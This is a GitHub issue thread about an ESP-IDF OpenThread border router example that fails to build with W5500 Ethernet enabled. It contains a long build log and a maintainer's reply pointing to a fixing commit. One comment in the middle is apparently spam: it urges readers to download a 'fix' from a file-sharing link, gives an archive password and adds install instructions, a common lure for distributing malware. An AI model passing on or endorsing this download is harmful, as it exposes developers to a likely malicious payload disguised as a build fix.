### ISSUE TITLE
ESP OpenThread BR W5500 Ethernet build error esp_eth on ESPRESSIF ref board (IDFGH-13560)

### ISSUE THREAD

**Issue by mawa85** [espressif/esp-idf#14449]
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

5.1.3, 5.3

### Operating System used.

Linux

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

None

### What is the expected behavior?

Successful build with Ethernet support

### What is the actual behavior?

Build works fine with WiFi support, but when I enable Ethernet I get the following build error

Compilation failed because protocol_examples_common.h (in "protocol_examples_common" component) includes esp_eth.h, provided by esp_eth component(s).
However, esp_eth component(s) is in the private requirements list of "protocol_examples_common".
To fix this, move esp_eth from PRIV_REQUIRES into REQUIRES list of idf_component_register call in /root/espidf_latest/esp-idf/examples/common_components/protocol_examples_common/CMakeLists.txt.

If I add esp_eth in REQUIRES I get other error

```
idf_component_register(SRCS "${srcs}"
                       INCLUDE_DIRS "include"
                       PRIV_REQUIRES esp_netif driver esp_wifi vfs console
                        REQUIRES esp_eth
)

```

> BUG: component_requirements.py: esp_eth.h found in component esp_eth which is already in the requirements list of protocol_examples_common

### Steps to reproduce.

https://docs.espressif.com/projects/esp-thread-br/en/latest/dev-guide/build_and_run.html

### Build or installation Logs.

```plain
root@LAPTOP-P8ME7IJ6:~/espidf_latest/esp-thread-br/examples/basic_thread_border_router# idf.py -n -p /dev/ttyACM0 flash monitor
Executing action: flash
Running make in directory /root/espidf_latest/esp-thread-br/examples/basic_thread_border_router/build
Executing "make -j 14 flash"...
[  0%] Built target partition_table_bin
[  0%] Built target sections.ld.in
[  0%] Built target custom_bundle
[  0%] Built target memory.ld
[  1%] Built target blank_ota_data
[  1%] Built target _project_elf_src
[  1%] Performing build step for 'bootloader'
[  1%] Built target rcp_image_generation
[  1%] Built target spiffs_web_storage_bin
[  0%] Built target _project_elf_src
[  4%] Built target __idf_log
[ 13%] Built target __idf_esp_rom
[ 14%] Built target __idf_esp_common
[ 24%] Built target __idf_esp_hw_support
[  1%] Built target spiffs_rcp_fw_bin
[ 26%] Built target __idf_esp_system
[ 35%] Built target __idf_efuse
[ 55%] Built target __idf_bootloader_support
[ 57%] Built target __idf_esp_bootloader_format
[ 59%] Built target __idf_spi_flash
[ 65%] Built target __idf_hal
[ 68%] Built target __idf_micro-ecc
[ 91%] Built target __idf_soc
[ 94%] Built target __idf_xtensa
[ 95%] Built target __idf_main
[ 98%] Built target bootloader.elf
[100%] Built target gen_project_binary
Bootloader binary size 0x51c0 bytes. 0x2e40 bytes (36%) free.
[100%] Built target bootloader_check_size
[100%] Built target app
[  1%] No install step for 'bootloader'
[  1%] Completed 'bootloader'
[  1%] Built target bootloader
Consolidate compiler generated dependencies of target __idf_openthread
[ 22%] Built target __idf_openthread
[ 23%] Built target __idf_esp_https_ota
[ 23%] Built target __idf_esp_http_server
[ 24%] Built target __idf_esp_http_client
[ 24%] Built target __idf_tcp_transport
[ 24%] Built target __idf_esp_gdbstub
[ 24%] Built target __idf_esp_eth
[ 24%] Built target __idf_esp_adc
[ 25%] Built target __idf_esp-tls
[ 25%] Built target __idf_http_parser
[ 26%] Built target __idf_console
[ 27%] Built target __idf_esp_wifi
[ 27%] Built target __idf_esp_coex
[ 33%] Built target __idf_wpa_supplicant
[ 34%] Built target __idf_esp_netif
[ 40%] Built target __idf_lwip
[ 40%] Built target __idf_vfs
[ 40%] Built target __idf_esp_vfs_console
[ 40%] Built target __idf_esp_phy
[ 41%] Built target __idf_driver
[ 41%] Built target __idf_esp_driver_usb_serial_jtag
[ 41%] Built target __idf_esp_driver_ledc
[ 41%] Built target __idf_esp_driver_i2c
[ 41%] Built target __idf_esp_driver_sdm
[ 41%] Built target __idf_esp_driver_tsens
[ 41%] Built target __idf_esp_driver_rmt
[ 41%] Built target __idf_esp_driver_sdspi
[ 42%] Built target __idf_esp_driver_sdmmc
[ 42%] Built target __idf_sdmmc
[ 43%] Built target __idf_esp_driver_i2s
[ 44%] Built target __idf_esp_driver_mcpwm
[ 44%] Built target __idf_esp_driver_spi
[ 44%] Built target __idf_esp_driver_pcnt
[ 45%] Built target __idf_nvs_flash
[ 46%] Built target __idf_esp_event
[ 47%] Built target __idf_esp_driver_uart
[ 47%] Built target __idf_esp_ringbuf
[ 47%] Built target __idf_esp_driver_gptimer
[ 48%] Built target __idf_esp_timer
[ 48%] Built target __idf_cxx
[ 49%] Built target __idf_pthread
[ 51%] Built target __idf_newlib
[ 52%] Built target __idf_freertos
[ 55%] Built target __idf_esp_hw_support
[ 57%] Built target __idf_soc
[ 58%] Built target __idf_heap
[ 59%] Built target __idf_log
[ 63%] Built target __idf_hal
[ 64%] Built target __idf_esp_rom
[ 64%] Built target __idf_esp_common
[ 67%] Built target __idf_esp_system
[ 69%] Built target __idf_spi_flash
[ 69%] Built target __idf_esp_mm
[ 70%] Built target __idf_bootloader_support
[ 71%] Built target __idf_efuse
[ 72%] Built target __idf_esp_partition
[ 72%] Built target __idf_app_update
[ 72%] Built target __idf_esp_bootloader_format
[ 73%] Built target __idf_esp_app_format
[ 75%] Built target mbedtls
[ 76%] Built target mbedx509
[ 83%] Built target mbedcrypto
[ 83%] Built target p256m
[ 83%] Built target everest
[ 84%] Built target __idf_mbedtls
[ 84%] Built target __idf_esp_pm
[ 85%] Built target __idf_esp_driver_gpio
[ 85%] Built target __idf_xtensa
Consolidate compiler generated dependencies of target __idf_protocol_examples_common
[ 85%] Built target __idf_espressif__mdns
[ 85%] Built target __idf_esp_driver_cam
[ 86%] Built target __idf_wear_levelling
[ 85%] Built target __idf_app_trace
[ 85%] Built target __idf_json
[ 86%] Built target __idf_esp_hid
[ 86%] Built target __idf_esp_https_server
[ 87%] Built target __idf_protobuf-c
[ 88%] Built target __idf_esp_lcd
[ 89%] Built target __idf_spiffs
[ 90%] Built target __idf_unity
[ 90%] Built target __idf_mqtt
[ 90%] Built target __idf_espcoredump
[ 90%] Built target __idf_protocol_examples_common
[ 90%] Built target __idf_nvs_sec_provider
[ 90%] Built target __idf_perfmon
[ 90%] Built target __idf_touch_element
[ 91%] Built target __idf_usb
[ 91%] Built target __idf_espressif__iperf
[ 92%] Built target __idf_espressif__esp-serial-flasher
[ 93%] Built target __idf_cmock
[ 94%] Built target __idf_fatfs
[ 95%] Built target __idf_protocomm
[ 95%] Built target __idf_espressif__esp_rcp_update
Scanning dependencies of target __idf_esp_ot_br_server
Consolidate compiler generated dependencies of target __idf_esp_ot_br_server
Consolidate compiler generated dependencies of target __idf_esp_local_ctrl
[ 96%] Built target __idf_wifi_provisioning
[ 96%] Building C object esp-idf/esp_ot_br_server/CMakeFiles/__idf_esp_ot_br_server.dir/src/esp_br_web_api.c.obj
[ 96%] Building C object esp-idf/esp_ot_br_server/CMakeFiles/__idf_esp_ot_br_server.dir/src/esp_br_web_base.c.obj
[ 97%] Built target __idf_esp_local_ctrl
[ 97%] Building C object esp-idf/esp_ot_br_server/CMakeFiles/__idf_esp_ot_br_server.dir/src/esp_br_web.c.obj
[ 97%] Built target __idf_esp_br_http_ota
[ 98%] Building C object esp-idf/espressif__esp_ot_cli_extension/CMakeFiles/__idf_espressif__esp_ot_cli_extension.dir/src/esp_ot_wifi_cmd.c.obj
In file included from /root/espidf_latest/esp-thread-br/examples/basic_thread_border_router/managed_components/espressif__esp_ot_cli_extension/src/esp_ot_wifi_cmd.c:30:
/root/espidf_latest/esp-idf/examples/common_components/protocol_examples_common/include/protocol_examples_common.h:17:10: fatal error: esp_eth.h: No such file or directory
   17 | #include "esp_eth.h"
      |          ^~~~~~~~~~~
compilation terminated.
make[3]: *** [esp-idf/espressif__esp_ot_cli_extension/CMakeFiles/__idf_espressif__esp_ot_cli_extension.dir/build.make:188: esp-idf/espressif__esp_ot_cli_extension/CMakeFiles/__idf_espressif__esp_ot_cli_extension.dir/src/esp_ot_wifi_cmd.c.obj] Error 1
make[2]: *** [CMakeFiles/Makefile2:6134: esp-idf/espressif__esp_ot_cli_extension/CMakeFiles/__idf_espressif__esp_ot_cli_extension.dir/all] Error 2
make[2]: *** Waiting for unfinished jobs....
[ 98%] Linking C static library libesp_ot_br_server.a
[ 98%] Built target __idf_esp_ot_br_server
make[1]: *** [CMakeFiles/Makefile2:2653: CMakeFiles/flash.dir/rule] Error 2
make: *** [Makefile:312: flash] Error 2
Compilation failed because protocol_examples_common.h (in "protocol_examples_common" component) includes esp_eth.h, provided by esp_eth component(s).
However, esp_eth component(s) is in the private requirements list of "protocol_examples_common".
To fix this, move esp_eth from PRIV_REQUIRES into REQUIRES list of idf_component_register call in /root/espidf_latest/esp-idf/examples/common_components/protocol_examples_common/CMakeLists.txt.
make failed with exit code 2, output of the command is in the /root/espidf_latest/esp-thread-br/examples/basic_thread_border_router/build/log/idf_py_stderr_output_366 and /root/espidf_latest/esp-thread-br/examples/basic_thread_border_router/build/log/idf_py_stdout_output_366
root@LAPTOP-P8ME7IJ6:~/espidf_latest/esp-thread-br/examples/basic_thread_border_router#
```

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gytxxsy** [comment]
Thank you for identifying this issue. It was caused by the `esp_ot_cli_extension` component missing related dependencies. The problem has been fixed in [dbd171f](https://github.com/espressif/esp-thread-br/commit/dbd171fd2d48e3c6fa84c227844d069f33005e79). Please pull the latest `esp-thread-br` code.

**Comment by mawa85** [comment]
thanks!
